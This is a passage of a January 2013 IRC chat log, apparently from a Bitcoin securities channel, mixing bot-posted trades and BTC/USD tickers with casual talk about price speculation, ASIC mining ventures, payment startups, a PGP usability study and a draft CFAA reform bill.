were in the same datacenter as me, same balckout Jan 17 02:22:51 [BTCTC] [GSDPT] 8750 @ 0.0047 = 41.125 BTC [+] Jan 17 02:22:54 oh no bad bvps press Jan 17 02:23:18 meh srsly you get a top notch root server for 50euros a month Jan 17 02:23:34 sorry i mixed it up Jan 17 02:23:40 https://bitcointalk.org/index.php?topic=131922.msg1414370#msg1414370 Jan 17 02:23:58 thestringpuller there is btc press ? Jan 17 02:23:59 it was operationfabulous , another ad network Jan 17 02:25:14 yes, something called trilema Jan 17 02:25:49 what ? Jan 17 02:26:09 you know that thing with porn syndication Jan 17 02:27:17 that's the bitcoin press :P Jan 17 02:27:20 i heard that name somehow before! Jan 17 02:30:59 [BTCTC] [GSDPT] 613 @ 0.0047 = 2.8811 BTC [+] Jan 17 02:33:22 ;;ticker Jan 17 02:33:23 BTCUSD ticker | Best bid: 14.64351, Best ask: 14.69999, Bid-ask spread: 0.05648, Last trade: 14.69999, 24 hour volume: 45851.62111428, 24 hour low: 14.21001, 24 hour high: 14.75000, 24 hour vwap: 14.52390 Jan 17 02:33:30 o wow. 15 ? Jan 17 02:34:13 [BTCTC] [COGNITIVE] 7 @ 0.43 = 3.01 BTC [-] Jan 17 02:34:51 http://bitbet.us/bet/83/s-dice-down-to-0-003xx-per-share-feb-11/ Jan 17 02:34:55 this one looks sweet Jan 17 02:46:13 hmm, anyone here with a btctc account ? Jan 17 02:50:35 ;;asks 25 Jan 17 02:50:37 There are currently 49313.389 bitcoins offered at or under 25.0 USD, worth 878896.357055 USD in total. Jan 17 02:52:02 time for a crash Jan 17 02:52:19 not a lot of volume to 25 Jan 17 02:52:55 ;;bids 10 Jan 17 02:52:57 There are currently 97005.469 bitcoins demanded at or over 10.0 USD, worth 1252122.45239 USD in total. Jan 17 02:53:00 i doubt it'll happen but that's interesting Jan 17 02:53:07 i think a runup much more likely. Jan 17 02:53:18 oh yeah for sure Jan 17 02:53:32 i expected more when i picked an arbitrarily high number Jan 17 02:53:40 ya seems incredibly sparse. Jan 17 02:58:23 http://blog.dwolla.com/person-to-person-for-banks-in-a-line-of-code/ Jan 17 02:58:35 i like dwolla at first, now meh Jan 17 03:06:23 [BTCTC] [COGNITIVE] 2 @ 0.43 = 0.86 BTC [-] Jan 17 03:09:41 [MPEX] [S.MPOE] 9293 @ 0.00065893 = 6.1234 BTC [-] Jan 17 03:09:44 [MPEX] [S.MPOE] 6183 @ 0.00065305 = 4.0378 BTC [-] Jan 17 03:11:17 [BTCTC] [GSDPT] 25 @ 0.0064 = 0.16 BTC [+] Jan 17 03:12:11 sorta like linode. Jan 17 03:12:22 so nobody has a btctc account ? Jan 17 03:13:41 omfg are these people insane ? curl unencrypted ? Jan 17 03:13:48 suppose i eavesdrop it and repeat. Jan 17 03:14:26 its a post over https Jan 17 03:14:32 not ideal Jan 17 03:14:36 but not plaintxt Jan 17 03:15:02 well no, not plaintext but omfg Jan 17 03:19:20 cutting edge Jan 17 03:20:24 i suppose they periodicly audit make sure no ex-linode employe is running a promiscuous sniffer anywhere on their network. Jan 17 03:22:56 anyway. anyone here want to pick up that coinurl thing and run it sanely ? Jan 17 03:23:02 jcpham: that looks just like simplepay or what was doing with the https curl command Jan 17 03:23:11 *waves hand* Jan 17 03:23:54 i will buy it for 1 bitcoin Jan 17 03:24:00 [BTCTC] [BTC-BOND] 420 @ 0.01 = 4.2 BTC [+] Jan 17 03:24:04 "Our case Jan 17 03:24:04 study used a cognitive walkthrough analysis together Jan 17 03:24:04 with a laboratory user test to evaluate whether PGP 5.0 Jan 17 03:24:04 can be successfully used by cryptography novices to Jan 17 03:24:04 achieve effective electronic mail security. The analysis Jan 17 03:24:04 found a number of user interface design flaws that may Jan 17 03:24:04 contribute to security failures, and the user test Jan 17 03:24:04 demonstrated that when our test participants were given Jan 17 03:24:04 90 minutes in which to sign and encrypt a message Jan 17 03:24:04 using PGP 5.0, the majority of them were unable to do Jan 17 03:24:04 so successfully. " Jan 17 03:24:25 lol Jan 17 03:24:29 my results are strangely better than that. Jan 17 03:24:39 i guess self selected scope ? Jan 17 03:24:55 where is this from Jan 17 03:25:51 a study im reading Jan 17 03:26:23 Alma Whitten / Carnegie Mellon University. Why Johnny Can’t Encrypt:A Usability Evaluation of PGP 5.0 Jan 17 03:28:38 [MPEX] [S.DICE] 851 @ 0.00538507 = 4.5827 BTC [-] Jan 17 03:28:39 [MPEX] [S.DICE] 1000 @ 0.00539131 = 5.3913 BTC [+] Jan 17 03:37:03 jcpham: Dwolla's code isn't this bad http://news.ycombinator.com/item?id=5026802 Jan 17 03:39:13 [MPEX] [S.MPOE] 14717 @ 0.00065305 = 9.6109 BTC [-] Jan 17 03:39:25 [MPEX] [S.MPOE] 4383 @ 0.00065302 = 2.8622 BTC [-] Jan 17 03:39:42 "You guys are fantastic. You documentation is clear. The fact that you all live on the IRC channels makes obtaining information and help super simple." Jan 17 03:40:01 im going to go troll balanced payments irc channel nao Jan 17 03:40:03 anyone with me ? Jan 17 03:41:05 its #balanced ftr Jan 17 03:41:46 is having an irc channel the hip thing to do? Jan 17 03:42:06 certainly. Jan 17 03:42:16 well, we have one. Jan 17 03:42:19 i thought it was about having a usenet group Jan 17 03:42:25 i thought that was the cool thing these days Jan 17 03:48:07 LOL Jan 17 03:48:25 20:47 < ajsharp> i can't tell if you're trolling or not Jan 17 03:49:13 i wasn't even ;/ Jan 17 03:50:38 look at that guys: https://github.com/balanced/balanced-api/issues/204 they have someeone who wanted to add bitcoin Jan 17 03:52:40 Each of Balanced.s customers is a potential Bitcoin merchant. Zaarly is using Balanced to provide payments handling for its peer-to-peer task market. Instead of Zaarly having to build its own, it can used Balanced.s API. With Bitcoin there is a little different flow. You can.t pull funds from a Bitcoin user. Bitcoin is push only. But Balanced also handles the payout component. And that is a push transaction. Bal Jan 17 03:52:48 But Balanced shows what is needed by the marketplace . a path that a Bitcoin variant could follow. Balanced is offered in the U.S. only. A bitcoin-variant could operate globally. Jan 17 03:53:30 so basically... "we don't know, and don't wanna talk about it" Jan 17 03:53:33 a well. Jan 17 03:54:15 the github issue has some answers Jan 17 03:54:22 im reading it nao Jan 17 03:57:05 there's absolutel;y nothing there. Jan 17 03:57:24 i'm sorry, but on the balance of this assesment balancedpayments is worth ~0, inflation adjusted. Jan 17 03:59:13 mircea_popescu: simple.com Jan 17 04:13:38 u gais are famous https://www.balancedpayments.com/help Jan 17 04:14:38 look at me ma, i'm on an obscure start-up site! it won't go anywhere! Jan 17 04:21:55 good arb op there eh? Jan 17 04:22:10 [21:19] Jan17 02:18:34 mtgox x194 3,924.8646 @ 14.83496831 USD Jan 17 04:22:14 [21:19] Jan17 02:18:34 mtgox x229 3,999.9658 @ 14.42321997 AUD Jan 17 04:22:32 what's bitcoinrt ? Jan 17 04:22:51 ;;later tell Bugpowder looks like people are putting basic point spread bets on bitbet now Jan 17 04:22:51 The operation succeeded. Jan 17 04:22:52 gox ticker Jan 17 04:23:08 websocket pipe whatever Jan 17 04:23:19 i guess, if anyone is ready to close aud-usd circuit Jan 17 04:25:50 ;;ticker Jan 17 04:25:50 BTCUSD ticker | Best bid: 14.78900, Best ask: 14.84339, Bid-ask spread: 0.05439, Last trade: 14.78900, 24 hour volume: 48112.84457123, 24 hour low: 14.21001, 24 hour high: 14.92000, 24 hour vwap: 14.57203 Jan 17 04:27:31 http://blockbet.net - here come the pseudo-clones Jan 17 04:34:52 [MPEX] [S.DICE] 250 @ 0.00574528 = 1.4363 BTC [+] Jan 17 04:44:52 thestringpuller there have been like... i think a dozen since the ipo Jan 17 04:46:49 ;;ticker Jan 17 04:46:50 BTCUSD ticker | Best bid: 14.90001, Best ask: 14.91999, Bid-ask spread: 0.01998, Last trade: 14.91999, 24 hour volume: 48305.04798786, 24 hour low: 14.21001, 24 hour high: 14.92000, 24 hour vwap: 14.57849 Jan 17 04:46:58 definitely 15 tonight. Jan 17 04:47:03 ;;asks 15 Jan 17 04:47:06 There are currently 7912.5205 bitcoins offered at or under 15.0 USD, worth 118573.407675 USD in total. Jan 17 04:47:51 ;;bids 14.90 Jan 17 04:47:53 There are currently 0 bitcoins demanded at or over 14.9 USD, worth 0.0 USD in total. Jan 17 04:48:00 ;;bids 14.80 Jan 17 04:48:02 There are currently 180.31955 bitcoins demanded at or over 14.8 USD, worth 2674.22552159 USD in total. Jan 17 04:48:27 ;;bids 14.85 Jan 17 04:48:29 There are currently 23.426751 bitcoins demanded at or over 14.85 USD, worth 349.058673438 USD in total. Jan 17 04:49:15 weekly forecast bet can be resolved early :) Jan 17 04:53:08 http://bitbet.us/bet/140/bitcoin-will-hit-15-before-february-1st/ ? Jan 17 04:53:14 still not 15 Jan 17 04:53:48 no, ziz one http://bitbet.us/bet/129/btc-usd-at-mtgox-will-stay-below-14-86-and/ Jan 17 04:54:01 enky lost hehe Jan 17 04:55:06 yee Jan 17 04:58:40 any clue for the SD jump ? Jan 17 04:59:01 bbet ran out of shares so they went for second best Jan 17 05:01:09 ahahaha Jan 17 05:01:20 error4733 supply and demand i imagine. Jan 17 05:01:35 seems in bitcoin demand is a sharply increasing inverse of supply. Jan 17 05:02:00 in retrospect maybe not surprising, given the nature of the btc game. Jan 17 05:04:08 inverse supply you mean all the scams or the block reward drop? Jan 17 05:04:17 ;) Jan 17 05:05:22 i mean the wider the supply, the lower the demand Jan 17 05:05:27 but once supply dwindles demand explodes. Jan 17 05:05:51 isnt this same case as producers and consumers Jan 17 05:05:53 sorta like childrend and toys. when nobody is playing nobody else wants to play. as toys become unavailable the desire to play increases Jan 17 05:05:54 :D Jan 17 05:06:16 i guess it's like producers and consumers in a strange market Jan 17 05:06:24 same for my wife Jan 17 05:06:38 lol she in demand when you want her and idle otherwise ? Jan 17 05:07:14 she's not involved Jan 17 05:07:16 :D Jan 17 05:07:22 :p Jan 17 05:07:28 yeah fuckin hoarding non-toy-sharing kids Jan 17 05:08:31 if SD up to 0.006 and btc hit 15$ i almost double my invest in 2 weeks Jan 17 05:08:40 insane Jan 17 05:08:42 dun worry is a ponzee Jan 17 05:08:59 error4733 someone was publishing his portofolio graph earlier and it looked quite exponential Jan 17 05:09:03 also Jan 17 05:09:05 pirate paid Jan 17 05:09:11 yesterday! Jan 17 05:09:15 whom ? Jan 17 05:09:32 aww cmon, recognize the meme Jan 17 05:09:34 :p Jan 17 05:09:39 lol deadpan Jan 17 05:09:51 ;;ticker Jan 17 05:09:52 BTCUSD ticker | Best bid: 14.91002, Best ask: 14.92000, Bid-ask spread: 0.00998, Last trade: 14.91002, 24 hour volume: 47727.52297059, 24 hour low: 14.21001, 24 hour high: 14.92000, 24 hour vwap: 14.58642 Jan 17 05:10:31 heh, we're reaching 15 Jan 17 05:12:10 50 cents off the vwap, that's pretty strong action. Jan 17 05:12:17 yeah Jan 17 05:12:31 the market needs to pause for awhile to keep us at this level Jan 17 05:12:47 I dont want to see another $30 spike and crash Jan 17 05:12:56 thats not useful for the longterm viability of bitcoins Jan 17 05:13:22 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.31226848 = 312.2685 BTC [+] Jan 17 05:13:25 not the same input for this raise Jan 17 05:13:29 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.24364587 = 243.6459 BTC [+] Jan 17 05:13:38 error4733: but it can be Jan 17 05:13:42 the $30 spike was panic buying Jan 17 05:13:46 theres no reason that cant be repeated Jan 17 05:13:50 Diablo-D3 im not so sure it matters by now. Jan 17 05:14:29 mircea_popescu: well, I'd like to see us at $100 perm Jan 17 05:14:42 i think 2013 will prolly do that. Jan 17 05:15:01 well, what Im saying is, we need a firm foundation to continue building on Jan 17 05:15:18 well i have a bet wit ha friend, BTC double this year Jan 17 05:15:33 28$ before 1 JAN 2104 Jan 17 05:15:35 prolly pretty safe bet. Jan 17 05:15:48 error4733: high or year end? Jan 17 05:15:58 because we'll likely see a $28 high Jan 17 05:16:12 but a 50/50 chance of $28 or higher becoming the new norm Jan 17 05:16:32 no 28 or more stable price Jan 17 05:16:49 more than 1 week Jan 17 05:17:51 95% risk is the user Jan 17 05:20:24 mircea_popescu : u think $100 can be possible until the end of the year ? Jan 17 05:21:05 i think it fairly likely. Jan 17 05:21:19 nyRednek: we tried that Jan 17 05:21:21 it didnt go well Jan 17 05:21:27 so the usage will increase for 500% with the same supply ? Jan 17 05:21:58 [MPEX] [S.MPOE] 1845 @ 0.00066525 = 1.2274 BTC [+] Jan 17 05:22:01 error4733 once people will come to terms with the failure of "asic projects" Jan 17 05:22:07 they will cover buying bitcoin Jan 17 05:22:10 you're in #bitcoin-assets and dont know we've already had publicly owned companies? Jan 17 05:22:10 [MPEX] [S.MPOE] 4698 @ 0.00066544 = 3.1262 BTC [+] Jan 17 05:22:14 (which is what they should have done in the first place) Jan 17 05:22:20 mircea_popescu: except both avalon and asicminer should be done soon Jan 17 05:22:35 *popcorn* Jan 17 05:22:41 conspicuously absent from that list, bfl Diablo-D3 :p Jan 17 05:22:51 Im surprised basic was a failure Jan 17 05:22:55 was it a scam or did they just fail? Jan 17 05:23:00 i'm not surprised Jan 17 05:23:06 this ASIC epic fail Jan 17 05:23:07 i don't think it was started as a scam. just, no skills. Jan 17 05:23:38 mircea_popescu: so just fail Jan 17 05:23:39 that sfine Jan 17 05:23:41 maybe BFL but all the others as well ? Jan 17 05:23:42 companies can fail Jan 17 05:23:49 its the outright scams I think we need to deal with Jan 17 05:23:51 like bfl Jan 17 05:24:05 how many dev in the world work on this tech Jan 17 05:24:08 i don't think anyone actually has the resources to do asics. people like to dream, and then they sometimes get confused. Jan 17 05:24:35 error4733 maybe half a dozen on the core and a few hundred on peripherals ? Jan 17 05:24:36 error4733: on what tech? chip design in general? Jan 17 05:24:48 look good on paper Jan 17 05:24:51 mircea_popescu: doing asics is easy Jan 17 05:24:54 mircea_popescu: it just costs money Jan 17 05:25:06 remember, neither asicminer nor avalon made their sha256 cores Jan 17 05:25:13 they used existing ones and spammed it on the chip Jan 17 05:25:14 yeah. Jan 17 05:25:22 that's the way to go, at their level. Jan 17 05:25:26 still, it has its problems. Jan 17 05:25:35 it works mostly Jan 17 05:25:38 nyRednek: mpbor isn't really a bond tho Jan 17 05:25:43 they just had to have the output cascade designed right Jan 17 05:25:45 depends what luck you have with resonance. Jan 17 05:25:46 which really isnt that hard Jan 17 05:25:58 mircea_popescu: yes, those fucking design tools are blaaaaaargh Jan 17 05:26:17 right. the problem with the "spam a core on chip" approach is that design cost is minimal Jan 17 05:26:20 prototype cost is huge Jan 17 05:26:27 yeah Jan 17 05:26:31 and what we're looking at IS the prototype Jan 17 05:26:33 meanwhile i've been asking questions, i know of a case where they did 54 prototypes Jan 17 05:26:39 before they got a set that was resonance free Jan 17 05:26:41 then they re-ran it Jan 17 05:26:44 AND IT DIDNT WORK Jan 17 05:26:50 yeah, shit like that happens Jan 17 05:26:50 :D Jan 17 05:27:09 asicminer already said their chips passed functionality tests Jan 17 05:27:11 ;;ticker Jan 17 05:27:12 BTCUSD ticker | Best bid: 14.81200, Best ask: 14.89900, Bid-ask spread: 0.08700, Last trade: 14.89959, 24 hour volume: 47066.51104494, 24 hour low: 14.21404, 24 hour high: 14.92000, 24 hour vwap: 14.59850 Jan 17 05:27:14 so hopefully at least one of the 4 wins Jan 17 05:27:32 at any rate, from a purely macro perspective, Jan 17 05:27:41 cant wait haha, this is huuuge Jan 17 05:27:44 as either cost of asic or losses from asic become monetized btc will have to go up Jan 17 05:28:02 [MPEX] [S.MPOE] 6002 @ 0.00066544 = 3.994 BTC [+] Jan 17 05:28:03 [MPEX] [S.MPOE] 9354 @ 0.00066568 = 6.2268 BTC [+] Jan 17 05:28:28 mircea_popescu: exactly Jan 17 05:28:33 no matter what, the work was done Jan 17 05:28:42 look at the silicon valley for example Jan 17 05:28:48 one of the biggest startup communities in the world Jan 17 05:28:52 if not THE biggest Jan 17 05:28:57 i think "the milk was spilleD" is more apt a comparison but anyway :p Jan 17 05:29:02 they fail more than not Jan 17 05:29:09 but it produces an amazingly thriving economy Jan 17 05:29:27 there's no problem with failure per se. Jan 17 05:29:28 even when the companies fail, it produces more economic output than went in Jan 17 05:29:48 the thing is we need to move away from cablepair and lambert type of failures to more economically tolerable types of failure Jan 17 05:30:25 yeah Jan 17 05:30:35 failure to mvp instead of outright scam or just wishful thinking Jan 17 05:30:48 basic is more than wishful thinking but below mvp Jan 17 05:30:54 imo anyways Jan 17 05:31:01 to our advantage the silicon valley world is slowly moving towards a pure circus act. Jan 17 05:31:12 http://trilema.com/2012/lets-have-fun-with-paul-graham/#comment-91400 Jan 17 05:31:14 look at that. Jan 17 05:32:12 Check it out! Own a part of a 3d printer! CREATE on [BTC-TC] https://bitcointalk.org/index.php?topic=136953.0 Jan 17 05:32:40 nyRednek: I tried getting a company to take off Jan 17 05:32:55 my first attempt was a failure because the stock exchange owner backstabbed everyone Jan 17 05:33:30 nyRednek: so Im in the middle of cleaning that up and going for another attempt Jan 17 05:34:00 mircea_popescu: before I click, is that pro pg or anti pg? Jan 17 05:34:36 anti. Jan 17 05:34:55 mircea_popescu: pg isnt the big bad though Jan 17 05:35:03 tho it's a moot point, it just documents their most recent blunder Jan 17 05:35:03 although I wish people would quit worshipping him Jan 17 05:35:15 i don't think he's the big bad either. Jan 17 05:35:17 the problem with the silicon valley atm is the mvp achievements Jan 17 05:35:32 the showmanship is the problem. Jan 17 05:35:34 whoever produces the smallest lightest easiest mvp wins Jan 17 05:35:37 mircea_popescu: exactly Jan 17 05:35:44 in their constant quest for "insight" about companies they kept going into sidechannels Jan 17 05:35:49 nyRednek: minimum viable product Jan 17 05:35:57 by now all they're doing is comparing which "team" has the weirdest approach to stand-up Jan 17 05:36:08 mircea_popescu: basically yes Jan 17 05:36:14 ya well it's stupid. Jan 17 05:36:17 they're starting to feedback into themselves weirdly Jan 17 05:36:29 like, whowever has the most unique weirdest circus act wins Jan 17 05:36:33 i don't pick girls by the criterion "largest tit most exposed" Jan 17 05:36:49 its like a competition of The Aristocrats Jan 17 05:36:50 if i did, i'd have an excuse. unlike them. Jan 17 05:36:53 yeah. Jan 17 05:38:25 nyRednek: nope Jan 17 05:38:30 profit ISNT the number one goal Jan 17 05:38:34 long term value is Jan 17 05:38:53 jesus you've been studying ? Jan 17 05:39:36 nyRednek: not always Jan 17 05:39:50 there are companies that hold massive assets that have pretty shitty cash flow Jan 17 05:40:04 they're not horrible companies, just maybe mediocre corporate leadership Jan 17 05:40:30 nyRednek Be careful, if you hang out here much longer you will end up owning some bitcoin securities Jan 17 05:40:31 the cash flow is positive, dont get me wrong, its just not that far from zero Jan 17 05:40:44 constant cashflow is better than large profits Jan 17 05:40:54 hmm Jan 17 05:41:09 mmm the new pympex is great Jan 17 05:41:22 the interface I deserve Jan 17 05:41:27 mircea_popescu: btw, what do you mean studying? Jan 17 05:41:37 lol Jan 17 05:42:50 elance is f'ing amazing Jan 17 05:42:54 Diablo-D3 you know, books. Jan 17 05:42:57 Bugpowder o ? Jan 17 05:43:02 I can hire an awesome pakistani programmer Jan 17 05:43:06 for $20/hr Jan 17 05:43:10 to do my bidding Jan 17 05:43:15 cool huh. Jan 17 05:43:20 better than webcams, imo. Jan 17 05:43:35 and you get screen caps every 10 minutes Jan 17 05:43:47 yeah I could pay less but this is a bit tricky job Jan 17 05:43:48 incidentally, read the code Jan 17 05:43:55 better discover keyloggers early than late. Jan 17 05:43:57 ha Jan 17 05:44:13 CSV isn't hiding much Jan 17 05:44:23 I just need data collected Jan 17 05:44:26 a Jan 17 05:44:37 from things that require mouseover ajax calls Jan 17 05:44:44 mircea_popescu: its not like securities are a new thing for me Jan 17 05:44:55 mircea_popescu: Ive been laughing at wall street since I was a kid Jan 17 05:45:03 it never made sense to me because it all looked like a giant ponzi Jan 17 05:45:39 mircea_popescu: and over the past, oh, 5 years or so, Ive learned why it never made sense, it really is just a giant scam Jan 17 05:45:44 well, it's a good point nonetheless. Jan 17 05:46:04 it has been kinda scammy since about 2nd bush term. Jan 17 05:46:13 its been kinda scammy since the 70s Jan 17 05:46:17 before I was born Jan 17 05:46:28 and various long term shit has been going on since before ww2 Jan 17 05:46:31 i kinda liked it in the 90s. Jan 17 05:46:39 before the dotcom bust? Jan 17 05:46:48 nah, late 90s Jan 17 05:46:56 during the recovery? Jan 17 05:47:17 during the bust. Jan 17 05:47:23 ahh Jan 17 05:47:29 there was lots of money to be made from that Jan 17 05:47:56 for some reason it's easier for me to pick companies that will fail than ones that will succeed. Jan 17 05:48:03 I know people who made money during the bubble, and then lost it when it popped; made it and kept it; and then made it DURING the pop Jan 17 05:48:08 mircea_popescu: weird Jan 17 05:48:10 possibly because i'm an asshole. Jan 17 05:48:15 I have trouble picking companies that will fail Jan 17 05:48:32 that's ok, you don't need to pick em, you make em :D Jan 17 05:48:37 I think my selection criteria of safe bets is too conservative Jan 17 05:48:42 hurrrrr Jan 17 05:48:47 mwahaha' Jan 17 05:48:49 mircea_popescu: like I said, I had lots of community help on that one Jan 17 05:48:57 bust started with MSTR Jan 17 05:49:26 mircea_popescu: everyone got to walk away with a sore asshole after the GLBSE bust Jan 17 05:49:27 Bugpowder to this day i didn't understand what microstrategy was making. Jan 17 05:50:00 business intelligence Jan 17 05:50:09 they are still around Jan 17 05:50:13 what the fuck does that even mean Jan 17 05:50:13 pretty big Jan 17 05:50:38 Like using algorithms to optimize internal shit Jan 17 05:51:01 thats insane Jan 17 05:51:25 Bugpowder no, srsly ? using algorithms to optimize internal shit ? Jan 17 05:51:26 insane? Jan 17 05:51:27 as a programmer and as someone who views both the law and business as domain specific languages, thats insane Jan 17 05:51:40 He lost 15 billion in the bust Jan 17 05:51:45 Sailor Jan 17 05:51:53 saylor Jan 17 05:52:35 yeah, when you lose 15 billion, the money didnt even really exist Jan 17 05:52:56 mircea_popescu: back me up about the insanity part Jan 17 05:53:00 when you have 15bn you don't have that money. Jan 17 05:53:14 Diablo-D3 i dunno either way. i still don't really comprehend what they did. Jan 17 05:53:33 it's somewhere between "dressing up mathlab for idiots" and "conversations with aliens and spirits of the departed" Jan 17 05:53:57 yes, but both of those ARE valid business models Jan 17 05:54:09 well the aliens part at least. Jan 17 05:54:21 VerizOrion Jan 17 05:54:25 still doing ok i guess Jan 17 05:54:25 http://fortunebrainstormtech.files.wordpress.com/2012/06/michael_saylor_yacht_friends.jpg Jan 17 05:54:52 Bugpowder seems kinda crowded :D Jan 17 05:55:51 [BTCTC] [COGNITIVE] 1 @ 0.421 BTC [-] Jan 17 05:55:53 [BTCTC] [COGNITIVE] 2 @ 0.42 = 0.84 BTC [-] Jan 17 05:55:55 [BTCTC] [COGNITIVE] 20 @ 0.411 = 8.22 BTC [-] Jan 17 05:55:55 [BTCTC] [COGNITIVE] 2 @ 0.411 = 0.822 BTC [-] Jan 17 05:56:15 [BTCTC] [COGNITIVE] 1 @ 0.4459 BTC [+] Jan 17 05:56:37 so... nobody with a btctc account ? Jan 17 05:57:43 [MPEX] [S.MPOE] 8400 @ 0.00066568 = 5.5917 BTC [+] Jan 17 06:01:52 [MPEX] [S.MPOE] 22000 @ 0.00066568 = 14.645 BTC [+] Jan 17 06:03:30 Anyone else notice that there has be some semi-whale like action on s.dice tonight? Jan 17 06:03:31 http://satoshidice.com/lookup.php?tx=&limit=100&min_bet=10&status=ALL Jan 17 06:03:51 couple 100s, a 250 Jan 17 06:07:04 semi-whale lol Jan 17 06:07:14 what, only 100k bet or something ? Jan 17 06:08:50 nah Jan 17 06:08:56 nothing that big Jan 17 06:09:14 good, SD run under EV for one week Jan 17 06:09:51 yeah, SDICE up 1300 in the last 100 bets over 10 Jan 17 06:10:01 wait Jan 17 06:10:08 where do u see that Jan 17 06:10:42 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.24450216 = 244.5022 BTC [+] Jan 17 06:11:01 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.31321887 = 313.2189 BTC [+] Jan 17 06:11:01 ;;ticker Jan 17 06:11:03 BTCUSD ticker | Best bid: 14.85109, Best ask: 14.89897, Bid-ask spread: 0.04788, Last trade: 14.89897, 24 hour volume: 45268.43294958, 24 hour low: 14.35600, 24 hour high: 14.92000, 24 hour vwap: 14.62078 Jan 17 06:11:22 !ticker m c11ot Jan 17 06:11:24 I don't give a shit who saw what and who did what or who did who. Jan 17 06:11:26 !ticker m c110t Jan 17 06:11:27 Um, shouldn't you be with your own tribe or somethin'? Jan 17 06:11:36 !ticker m o.btcusd.c110t Jan 17 06:11:38 [MPEX:O.BTCUSD.C110T] 1D: 0.31226848 / 0.31274367 / 0.31321887 (2000 shares, 625.49 BTC), 7D: 0.21996239 / 0.28818392 / 0.31321887 (2720 shares, 783.86 BTC), 30D: 0.16843117 / 0.25993706 / 0.31321887 (10665 shares, 2,772.23 BTC) Jan 17 06:12:09 Please let this bill pass Jan 17 06:12:10 http://lofgren.house.gov/images/stories/pdf/draft%20lofgren%20bill%20to%20exclude%20terms%20of%20service%20violations%20from%20cfaa%20%20wre%20fraud%20011513.pdf Jan 17 06:12:22 error4733 on my google doc importer Jan 17 06:12:52 Try this line Jan 17 06:12:53 =ImportHtml("http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL","table",0) Jan 17 06:13:06 in the first cell of a google spreadsheet Jan 17 06:13:21 then you can build your own analysis around it Jan 17 06:14:04 [MPEX] [S.MPOE] 9646 @ 0.00066568 = 6.4211 BTC [+] Jan 17 06:14:06 [MPEX] [S.MPOE] 7700 @ 0.00066642 = 5.1314 BTC [+] Jan 17 06:14:07 [MPEX] [S.MPOE] 254 @ 0.0006698 = 0.1701 BTC [+] Jan 17 06:14:35 [MPEX] [S.MPOE] 4206 @ 0.00066482 = 2.7962 BTC [-] Jan 17 06:14:45 [MPEX] [S.MPOE] 3594 @ 0.00065882 = 2.3678 BTC [-] Jan 17 06:15:15 Bugpowder who sponsored that ? Jan 17 06:16:27 http://lofgren.house.gov Jan 17 06:16:34 "Aaron's law" Jan 17 06:16:42 pretty good. Jan 17 06:16:43 Let the scraping commence! Jan 17 06:16:53 Repping silicon valley Jan 17 06:17:14 @bug : ok and ? some manip to do ? Jan 17 06:17:20 dude Jan 17 06:17:21 http://lofgren.house.gov/index.php?option=com_content&view=article&id=771:rep-zoe-lofgren-asks-reddit-users-to-crowdsource-legislative-proposals-on-domain-name-seizures&catid=22:112th-news&Itemid=161 Jan 17 06:17:21 also Jan 17 06:17:29 you can work a spreadsheet Jan 17 06:17:41 anyway, that's all for me. catch you all laters! Jan 17 06:17:51 me 2 Jan 17 06:17:53 later Jan 17 06:17:59 the upstreak continues! **** BEGIN LOGGING AT Thu Jan 17 12:23:02 2013 Jan 17 12:23:53 ;;ticker Jan 17 12:23:55 BTCUSD ticker | Best bid: 14.85001, Best ask: 14.87999, Bid-ask spread: 0.02998, Last trade: 14.88000, 24 hour volume: 43785.59666564, 24 hour low: 14.42508, 24 hour high: 14.92000, 24 hour vwap: 14.66609 Jan 17 12:25:00 awaaaaaaaaAAaaaaAAAaaaAAaaAAAAAAAaaAAAAAAaaaAAaaAAaAAAy we gooooo Jan 17 12:28:00 [MPEX] [S.DICE] 400 @ 0.005879 = 2.3516 BTC [+] Jan 17 13:03:04 jcpham smickles check it out : i'm getting sued! 1st rota case http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 17 13:03:28 lolwat Jan 17 13:17:38 yeah Jan 17 13:57:44 http://www.youtube.com/watch?v=Jsj-37UrxeM Jan 17 13:57:50 welcome to the 90s all over again Jan 17 14:11:16 [MPEX] [S.MPOE] 1811 @ 0.00066217 = 1.1992 BTC [+] Jan 17 14:11:18 [MPEX] [S.MPOE] 8350 @ 0.00066194 = 5.5272 BTC [-] Jan 17 14:11:20 [MPEX] [S.MPOE] 7139 @ 0.00065987 = 4.7108 BTC [-] Jan 17 14:23:01 [MPEX] [S.MPOE] 18208 @ 0.00065987 = 12.0149 BTC [-] Jan 17 14:23:01 [MPEX] [S.MPOE] 5392 @ 0.00065943 = 3.5556 BTC [-] Jan 17 14:54:02 [MPEX] [S.MPOE] 8858 @ 0.00065943 = 5.8412 BTC [-] Jan 17 14:54:03 [MPEX] [S.MPOE] 12042 @ 0.0006592 = 7.9381 BTC [-] Jan 17 14:59:09 ;;ticker Jan 17 14:59:10 BTCUSD ticker | Best bid: 14.85117, Best ask: 14.91196, Bid-ask spread: 0.06079, Last trade: 14.91196, 24 hour volume: 46332.20423688, 24 hour low: 14.45000, 24 hour high: 14.92000, 24 hour vwap: 14.70084 Jan 17 15:02:47 http://i.imgur.com/V1gyt.jpg Jan 17 15:09:37 http://siliconangle.com/blog/2013/01/15/bitcoinstore-plans-to-take-on-the-world-of-online-electronics-retail-with-btc/ Jan 17 15:09:42 seems this one is happening. Jan 17 15:09:44 cool. Jan 17 15:13:10 [MPEX] [S.MPOE] 14650 @ 0.0006592 = 9.6573 BTC [-] Jan 17 15:22:18 [MPEX] [S.DICE] 500 @ 0.00579708 = 2.8985 BTC [-] Jan 17 15:22:25 [MPEX] [S.DICE] 176 @ 0.00573305 = 1.009 BTC [-] Jan 17 15:26:05 [MPEX] [S.MPOE] 9278 @ 0.00066312 = 6.1524 BTC [+] Jan 17 15:26:12 [MPEX] [S.MPOE] 21150 @ 0.00066541 = 14.0734 BTC [+] Jan 17 15:26:23 [MPEX] [S.MPOE] 20509 @ 0.00066974 = 13.7357 BTC [+] Jan 17 15:26:25 [MPEX] [S.MPOE] 13868 @ 0.00067027 = 9.2953 BTC [+] Jan 17 15:26:26 [MPEX] [S.MPOE] 17250 @ 0.00067029 = 11.5625 BTC [+] Jan 17 15:27:01 [MPEX] [S.MPOE] 5750 @ 0.0006714 = 3.8606 BTC [+] Jan 17 15:27:01 [MPEX] [S.MPOE] 20450 @ 0.00067238 = 13.7502 BTC 